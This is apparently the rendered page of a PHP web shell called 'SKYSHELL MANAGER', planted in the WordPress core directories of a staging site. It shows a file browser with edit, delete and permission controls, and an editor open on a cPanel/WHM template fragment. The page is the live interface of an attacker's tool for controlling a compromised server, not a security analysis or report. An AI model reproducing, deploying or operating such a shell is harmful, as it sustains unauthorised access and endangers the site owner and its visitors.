📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: selectmanager
<table> <tr> <td align="left"> Users: <input type="text" size="10" name="regenter" value=""> </td> <td> <input type="button" class="btn-secondary" onClick="selectMatching(this.form,'whm450move-',document.secform.regenter.value,0)" value="Select Matching Users"> <input type="button" class="btn-secondary" onClick="selectMatching(this.form,'whm450move-',document.secform.regenter.value,1)" value="Deselect Matching Users"> </td> </tr> <tr> <td align="left"> Reseller: <select name="resellerenter"> !@reslist@! <option value="%reseller%">%reseller%</option> !@reslist@! </select> </td> <td> <input type="button" class="btn-secondary" onClick="selectReseller(this.form,document.secform.resellerenter.options[document.secform.resellerenter.selectedIndex].value,0)" value="Select Matching Reseller Accounts"> <input type="button" class="btn-secondary" onClick="selectReseller(this.form,document.secform.resellerenter.options[document.secform.resellerenter.selectedIndex].value,1)" value="Deselect Matching Reseller Accounts"> </td> </tr> </table> <div style="clear:both;"></div> <script> YAHOO.util.Event.addListener( document.getElementById('pkgtbl') , "mousedown" , function(e) { checkarea='pkgtbl'; handleSelectBoxMouseDown(e); }); YAHOO.util.Event.addListener( document.getElementById('accttbl') , "mousedown" , function(e) { checkarea='accttbl'; handleSelectBoxMouseDown(e); }); </script> <div id="select" style="padding:0px;margin:0px;opacity:0.4;filter:progid:DXImageTransform.Microsoft.Alpha(opacity=40);filter=alpha(opacity=40);position:absolute;float:left;z-index:3000;left:1px;top:1px;background-color:#aaf;border: solid 2px #33c;display:none;"> </div>
Save